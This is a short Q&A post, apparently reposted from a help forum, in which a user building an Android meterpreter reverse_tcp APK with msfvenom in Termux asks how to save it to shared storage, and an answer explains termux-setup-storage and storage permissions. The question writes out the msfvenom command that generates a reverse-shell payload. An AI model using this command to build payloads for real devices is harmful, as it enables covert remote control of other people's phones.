Saturday, February 26, 2022

[SOLVED] Msfvenom payload stuck in termux directory

Issue

Quick cyber sec question

Im playing around with metasploit in termux and resolved most issues except for the following:

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=000 R> /$HOME/payload.apk

The above code succesfully compiles the reverse_tcp payload however it is saved to the $HOME directory in termux where it is unusable.

Ive attempted doing R> /sdcard/payload.apk but the directory can not be found.

Changing to: R> /$SDcard/payload.apk throws the following error "Read-only file system" which leads me to believe its either a storage permisson problem or OS limitation as im using Android 5.1.1

Does anyone perhaps know how I can get msfvenom to save payloads to internal storage or sdcard where it can be utilized?

Thanks in advance :)


Solution

The termux-tools package, which is pre-installed in the distribution has a command termux-setup-storage which will allow Termux to access your Internal Device Storage.

You can also go to App Info > Permissions & Enable Storage in order to allow Termux to access the Internal Storage of your phone which will no longer give you the "Read Only filesystem" error.

P.S. termux-setup-storage also creates a new directory in $HOME with symlinks to important locations in your Internal Storage such as Downloads, Pictures, Music etc.

i.e. in simple terms,

  1. Run termux-setup-storage.
  2. Allow storage permissions.
  3. You're good to go.


Answered By - hewhomustnotbenamed
Answer Checked By - Terry (WPSolving Volunteer)